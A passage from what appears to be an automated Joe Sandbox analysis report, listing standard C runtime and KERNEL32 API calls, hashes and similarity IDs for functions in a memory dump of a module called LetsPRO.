                                          • Part of subcall function 6C911E74: _unlock_file.MSVCR100(?,6C911ED0), ref: 6C911E77
                                        • _errno.MSVCR100(6C911EE0,0000000C), ref: 6C928DB4
                                        • _invalid_parameter_noinfo.MSVCR100(6C911EE0,0000000C), ref: 6C928DBF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_fileno_fseek_nolock_invalid_parameter_noinfo_lock_lock_file_lseek_unlock_file
                                        • String ID:
                                        • API String ID: 4149153117-0
                                        • Opcode ID: 6fd6b663ccd44a624083e79aca0f6f346768095fcb44bc35be15c4f14ed915bc
                                        • Instruction ID: 6c183eb4db444d3face97fff9c8a95f220e9512be3e9ff027fb58e2524023534
                                        • Opcode Fuzzy Hash: 6fd6b663ccd44a624083e79aca0f6f346768095fcb44bc35be15c4f14ed915bc
                                        • Instruction Fuzzy Hash: DFF06232D06519FBEF119FB4DC067CE7A756F32368F118225E8346AEA0CB34D948CA91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C946D87
                                        • EnterCriticalSection.KERNEL32(?,00000008,6C9491A9), ref: 6C946D99
                                        • ??2@YAPAXI@Z.MSVCR100(00000038), ref: 6C946DC1
                                          • Part of subcall function 6C93B79F: __EH_prolog3.LIBCMT ref: 6C93B7A6
                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C946DE1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalH_prolog3Section$??2@EnterLeave
                                        • String ID:
                                        • API String ID: 3492688627-0
                                        • Opcode ID: 29b0d9fc575b6c424c738c1555987f87e1ad2693dbd94b3023f5c3c44dfd4ded
                                        • Instruction ID: d83e43b12b46f187472bb6cabb3a6a8c13dbf8a0530adf0ccc5121198b2575db
                                        • Opcode Fuzzy Hash: 29b0d9fc575b6c424c738c1555987f87e1ad2693dbd94b3023f5c3c44dfd4ded
                                        • Instruction Fuzzy Hash: 44F0AFB0605744CEEB609FB4C98978AB6F8AF2175DF10C42ED06AC6E40CB74D148CB11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo_memmove
                                        • String ID:
                                        • API String ID: 3898388434-0
                                        • Opcode ID: 8c5f24e3c58f701dbdd84093b3e3eaed29729bef5a6a32609766b24136a0cb8e
                                        • Instruction ID: 725ed41cbba9ce45be8561ff77f346edf3a35cca74d44103108cd1cfbe4ed77a
                                        • Opcode Fuzzy Hash: 8c5f24e3c58f701dbdd84093b3e3eaed29729bef5a6a32609766b24136a0cb8e
                                        • Instruction Fuzzy Hash: 50F0E231211245EFEB215E98AC04BDA37D8AF14718F01103AF9288AA50EB79C848CAA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _lock.MSVCR100(00000007,6C9120A8,0000000C), ref: 6C912071
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                          • Part of subcall function 6C9121D3: wcsnlen.MSVCR100(?,00007FFF,?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C9121FD
                                          • Part of subcall function 6C9121D3: wcsnlen.MSVCR100(?,00007FFF,?,00007FFF,?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C912208
                                          • Part of subcall function 6C9121D3: _calloc_crt.MSVCR100(00000002,00000002), ref: 6C912227
                                          • Part of subcall function 6C9121D3: wcscpy_s.MSVCR100(00000000,00000002,?), ref: 6C91223E
                                          • Part of subcall function 6C9121D3: wcscpy_s.MSVCR100(?,00000002,?,00000000,00000002,?), ref: 6C91225B
                                          • Part of subcall function 6C9121D3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C912299
                                          • Part of subcall function 6C9121D3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C9122B5
                                          • Part of subcall function 6C9121D3: _calloc_crt.MSVCR100(00000000,00000001), ref: 6C9122C2
                                        • _errno.MSVCR100(6C9120A8,0000000C), ref: 6C93110A
                                        • _invalid_parameter_noinfo.MSVCR100(6C9120A8,0000000C), ref: 6C931114
                                        • _errno.MSVCR100(6C9120A8,0000000C), ref: 6C931120
                                          • Part of subcall function 6C91204A: _unlock.MSVCR100(00000007,6C91209F,6C9120A8,0000000C), ref: 6C91204C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_calloc_crt_errnowcscpy_swcsnlen$CriticalEnterSection_invalid_parameter_noinfo_lock_unlock
                                        • String ID:
                                        • API String ID: 813033701-0
                                        • Opcode ID: ae9052bead484b748e72e87693c1092902d78c7d15b4e2aa5574ce1b5981bcc4
                                        • Instruction ID: 9be08accae8a2f412522a26cc0b6937278363a4114fcbe024f005eeb36a6e5cd
                                        • Opcode Fuzzy Hash: ae9052bead484b748e72e87693c1092902d78c7d15b4e2aa5574ce1b5981bcc4
                                        • Instruction Fuzzy Hash: AFF0B431B08A09EFEB00AF74D8067CD3770AF32328F109119E4289AEE0DF39C6498B50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?_Abort@_StructuredTaskCollection@details@Concurrency@@AAEXXZ.MSVCR100 ref: 6C935CC9
                                          • Part of subcall function 6C944F74: ?_Cancel@_StructuredTaskCollection@details@Concurrency@@QAEXXZ.MSVCR100(?,?,?,?,?,?,?,6C935CCE), ref: 6C944FC0
                                        • __uncaught_exception.MSVCR100 ref: 6C935CCE
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT(00000001), ref: 6C935CF4
                                        • _CxxThrowException.MSVCR100(6C935D09,6C9A0CB8,00000001), ref: 6C935D02
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Collection@details@Concurrency@@StructuredTask$Abort@_Cancel@_Concurrency::unsupported_os::unsupported_osExceptionThrow__uncaught_exception
                                        • String ID:
                                        • API String ID: 176145414-0
                                        • Opcode ID: 2cf7afd18bd990d60c51a43d7924accfac08743652f668e7d27aa3ff008e0bcb
                                        • Instruction ID: 68437ae1cf288aa6b9d7a99e701abedb00aeee7856a91a162413302a2337a3f2
                                        • Opcode Fuzzy Hash: 2cf7afd18bd990d60c51a43d7924accfac08743652f668e7d27aa3ff008e0bcb
                                        • Instruction Fuzzy Hash: 07F0A73090031857CF009BB58109BCC73A89FA524CF14949A4419ABE41DB36D00FCF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C938EE6
                                        • CloseHandle.KERNEL32(?,00000004,6C938C1A), ref: 6C938F10
                                        • CloseHandle.KERNEL32(?,00000004,6C938C1A), ref: 6C938F24
                                        • ??3@YAXPAX@Z.MSVCR100(?), ref: 6C938F54
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseHandle$??3@H_prolog3
                                        • String ID:
                                        • API String ID: 236738836-0
                                        • Opcode ID: a9ce906bc22e05f6297305da9930cc1a12e709f6f4168d68317df5970ac66e50
                                        • Instruction ID: cc85c78197b60b92186fe1aa80ca6012bf445faa147feefecdaeb9240baa17a8
                                        • Opcode Fuzzy Hash: a9ce906bc22e05f6297305da9930cc1a12e709f6f4168d68317df5970ac66e50
                                        • Instruction Fuzzy Hash: 56F03CB160071087E7209F71C88079A72B9BFA4359F60981DD5ADD7B40CF75E858CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _lock_file.MSVCR100(?,?,?,?,?,?,?,6C90A900,0000000C), ref: 6C90A8D1
                                          • Part of subcall function 6C90A4CD: _lock.MSVCR100(?,?,?,6C956EF0,00000040,6C956F28,0000000C,6C9286C6,00000000,?), ref: 6C90A4FA
                                        • _fclose_nolock.MSVCR100(?,?,?,?,?,?,?,6C90A900,0000000C), ref: 6C90A8DC
                                          • Part of subcall function 6C90A84F: __freebuf.LIBCMT ref: 6C90A873
                                          • Part of subcall function 6C90A84F: _fileno.MSVCR100(?,?,?), ref: 6C90A879
                                          • Part of subcall function 6C90A84F: _close.MSVCR100(00000000,?,?,?), ref: 6C90A87F
                                          • Part of subcall function 6C90A91C: _unlock_file.MSVCR100(?,6C90A8F1,?,?,?,?,?,?,6C90A900,0000000C), ref: 6C90A91D
                                        • _errno.MSVCR100(?,?,?,?,?,?,6C90A900,0000000C), ref: 6C928C13
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6C90A900,0000000C), ref: 6C928C1E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __freebuf_close_errno_fclose_nolock_fileno_invalid_parameter_noinfo_lock_lock_file_unlock_file
                                        • String ID:
                                        • API String ID: 1403730806-0
                                        • Opcode ID: 36ffc65c686569e422304f06f84c041f317cfb83a252b966960c9b8942315ee6
                                        • Instruction ID: 6b29aeb91e0a2bb747374d22e1a0ef31b8f227616a9e8d3ebfac91eeb1477015
                                        • Opcode Fuzzy Hash: 36ffc65c686569e422304f06f84c041f317cfb83a252b966960c9b8942315ee6
                                        • Instruction Fuzzy Hash: BEF06D31E02B45DAE7109B748804BDE7AA06F21338F15874D9974A6AD0CF3CC6468B98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C93C6CF
                                        • EnterCriticalSection.KERNEL32(?,00000008,6C938816), ref: 6C93C6E1
                                          • Part of subcall function 6C9389AC: TlsSetValue.KERNEL32(?,?), ref: 6C9389D7
                                          • Part of subcall function 6C9389AC: GetCurrentThread.KERNEL32 ref: 6C938A03
                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C93C71C
                                        • SetEvent.KERNEL32(?), ref: 6C93C72B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$CurrentEnterEventH_prolog3LeaveThreadValue
                                        • String ID:
                                        • API String ID: 2643705923-0
                                        • Opcode ID: 609bc55d97edc088460531a4742a7721d0fba893b8e44ae8f1ed6227298ffb62
                                        • Instruction ID: f682ccc5ce8099985f1ef24e5695e9f9241427950a9988d55a545492af69d3ad
                                        • Opcode Fuzzy Hash: 609bc55d97edc088460531a4742a7721d0fba893b8e44ae8f1ed6227298ffb62
                                        • Instruction Fuzzy Hash: 05F04630900230DBCF11AFA4C48C3DC7BB4AF6134DF0451A9D80B6BA80CB36CA1AC792
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo_wfsopen
                                        • String ID:
                                        • API String ID: 972587971-0
                                        • Opcode ID: 58cdff9a686d0296a655c13c5f27337d5a3a4fd70ef916a92d3c2f460afb8a74
                                        • Instruction ID: 2f8f15f65b8b682ddcc068717af97039a83c48a2f52021059b3dc658dc0af69d
                                        • Opcode Fuzzy Hash: 58cdff9a686d0296a655c13c5f27337d5a3a4fd70ef916a92d3c2f460afb8a74
                                        • Instruction Fuzzy Hash: 9FE02232741224EBC7116E689C01ADE3768AF61B18F000068F9089BB01EF32D80083E4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002), ref: 6C9423DA
                                          • Part of subcall function 6C942161: std::exception::exception.LIBCMT(6C941FF3,?,6C941FF3,00000001), ref: 6C942180
                                          • Part of subcall function 6C942161: _CxxThrowException.MSVCR100(?,6C9A0EAC,6C941FF3), ref: 6C942195
                                        • std::exception::exception.LIBCMT(?,00000008,00000002), ref: 6C9423F2
                                        • _CxxThrowException.MSVCR100(?,6C9A0EC8,?,00000008,00000002), ref: 6C942407
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000002), ref: 6C942411
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Policy$Concurrency@@ElementExceptionKey@2@@Policy@SchedulerThrowValue@std::exception::exception
                                        • String ID:
                                        • API String ID: 1427302437-0
                                        • Opcode ID: acd70aaa9f670c6bc0ddfad792e741842e0e35ea02546df11b60939335594f07
                                        • Instruction ID: 2003e40ebe6c511973badba768eb1d55f95b8008a29b81fe9ecefeee56569fbd
                                        • Opcode Fuzzy Hash: acd70aaa9f670c6bc0ddfad792e741842e0e35ea02546df11b60939335594f07
                                        • Instruction Fuzzy Hash: BBF01272604208ABC704DFE5D946ADE77B8BF64788F11C125ED06D7B40DB30D6498B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(6C956F28,0000000C,6C9286C6,00000000,?), ref: 6C956ED3
                                        • _invalid_parameter_noinfo.MSVCR100(6C956F28,0000000C,6C9286C6,00000000,?), ref: 6C956EDE
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _lock_file.MSVCR100(00000040,6C956F28,0000000C,6C9286C6,00000000,?), ref: 6C956EEB
                                        • _ungetc_nolock.MSVCR100(?,00000040,6C956F28,0000000C,6C9286C6,00000000,?), ref: 6C956EFB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_invalid_parameter_noinfo_lock_file_ungetc_nolock
                                        • String ID:
                                        • API String ID: 3962069902-0
                                        • Opcode ID: 446e5b521dc44d0b41ea8930206c1efe745c163333bffdb55c1c1d9439200edd
                                        • Instruction ID: 7ae85d378c5c72197437b45e90e28bd250034479471dfa3e6903b0203a60a271
                                        • Opcode Fuzzy Hash: 446e5b521dc44d0b41ea8930206c1efe745c163333bffdb55c1c1d9439200edd
                                        • Instruction Fuzzy Hash: 17F08231E05205EADB519F74DC016CD3B70AF60338F508219A438D9BE0CF39C569DB10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetThreadPriority.KERNEL32(?,?), ref: 6C946FA2
                                        • GetLastError.KERNEL32 ref: 6C946FAC
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C946FC4
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C946FD2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastPriorityThreadThrow
                                        • String ID:
                                        • API String ID: 152467346-0
                                        • Opcode ID: 8019ddb0e2744c7b359da21508f038206fddf82bb151f821e102fe3c0259f6b3
                                        • Instruction ID: 27aea207e1d276ef52e90601427ca6fbafde56483a0c9f5aaccb265ae04aa8b9
                                        • Opcode Fuzzy Hash: 8019ddb0e2744c7b359da21508f038206fddf82bb151f821e102fe3c0259f6b3
                                        • Instruction Fuzzy Hash: 42F0A0B16202059FCB149F60C804EAA37BCBF60358B108869A465D6A20DB35F914CA94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C93FEA8
                                          • Part of subcall function 6C93FEF9: __EH_prolog3.LIBCMT ref: 6C93FF00
                                          • Part of subcall function 6C93FEF9: ??3@YAXPAX@Z.MSVCR100(?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FF26
                                          • Part of subcall function 6C93FEF9: ??3@YAXPAX@Z.MSVCR100(00000000), ref: 6C93FF70
                                          • Part of subcall function 6C93FEF9: ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FF84
                                          • Part of subcall function 6C93FEF9: ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,?,?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FF8C
                                          • Part of subcall function 6C93FEF9: TlsFree.KERNEL32(?,?,?,?,?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FF96
                                          • Part of subcall function 6C93FEF9: InterlockedPopEntrySList.KERNEL32(6C9A55D0,6C9A55DC,?,?,?,?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FFF7
                                        • DeleteCriticalSection.KERNEL32(?,00000004,6C93FE8D), ref: 6C93FED1
                                        • DeleteCriticalSection.KERNEL32(?), ref: 6C93FEDA
                                          • Part of subcall function 6C93F9D8: InterlockedFlushSList.KERNEL32(?,?,?,6C93F2EA), ref: 6C93F9E3
                                          • Part of subcall function 6C93F9D8: InterlockedFlushSList.KERNEL32(?,?,?,6C93F2EA), ref: 6C93F9FD
                                          • Part of subcall function 6C93F9D8: ??3@YAXPAX@Z.MSVCR100(00000000,?,?,6C93F2EA), ref: 6C93FA3B
                                          • Part of subcall function 6C93F9D8: ??_V@YAXPAX@Z.MSVCR100(?,?,?,6C93F2EA), ref: 6C93FA4C
                                          • Part of subcall function 6C93F9D8: ??3@YAXPAX@Z.MSVCR100(?,?,?,?,6C93F2EA), ref: 6C93FA52
                                          • Part of subcall function 6C93F9D8: ??_V@YAXPAX@Z.MSVCR100(?,?,?,6C93F2EA), ref: 6C93FA62
                                        • ??3@YAXPAX@Z.MSVCR100(00000004), ref: 6C93FEE7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ??3@$InterlockedList$CriticalDeleteFlushH_prolog3Section$EntryFree
                                        • String ID:
                                        • API String ID: 2014981224-0
                                        • Opcode ID: 9fd8ca7d2cd25ae578ff1d7bed1c866fcf09d8fa870041606034802ed59c0ae7
                                        • Instruction ID: 4c8fb070f8ff9411e17bf3123ddafc99172cacedaae6c01ccaee357058bc0032
                                        • Opcode Fuzzy Hash: 9fd8ca7d2cd25ae578ff1d7bed1c866fcf09d8fa870041606034802ed59c0ae7
                                        • Instruction Fuzzy Hash: 02E0EDF2A4062AEBCB049FB4D9016C8FB78FFA0318F141456D21897A50CB70E629CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __aulldvrm_mbtowc_l
                                        • String ID: '
                                        • API String ID: 1725609986-1997036262
                                        • Opcode ID: 13a3fd72fefd84486272c1673a2cfeadd2338e2ca30486c1e54d7c25c99db075
                                        • Instruction ID: dce8f0fafe5434e13abdc1a5035901849e45d23063be466e166452a2da0a7e46
                                        • Opcode Fuzzy Hash: 13a3fd72fefd84486272c1673a2cfeadd2338e2ca30486c1e54d7c25c99db075
                                        • Instruction Fuzzy Hash: 6BB16CB1B046698ADB208E18CD807D8B3B9AB4671DF1442EDD758B7A81D730DAC5CF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 6C97CDD8
                                        • __DestructExceptionObject.MSVCR100(?,00000001), ref: 6C97CDEA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CurrentDestructExceptionImageNonwritableObject
                                        • String ID: csm
                                        • API String ID: 574919218-1018135373
                                        • Opcode ID: 1431a3eadc5377cee97ff0cdfcd65910ac011a1ee10a635d4340d766d35c0a6f
                                        • Instruction ID: 84c5e07aa20ac617721ef1a5d77d48aba7bd851d42233b276f3c827d9279cecf
                                        • Opcode Fuzzy Hash: 1431a3eadc5377cee97ff0cdfcd65910ac011a1ee10a635d4340d766d35c0a6f
                                        • Instruction Fuzzy Hash: DF5184346012059FDB24DF69C594AAEBBB5FF88328F14855DEC269B791C730E941CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C95604B
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C956056
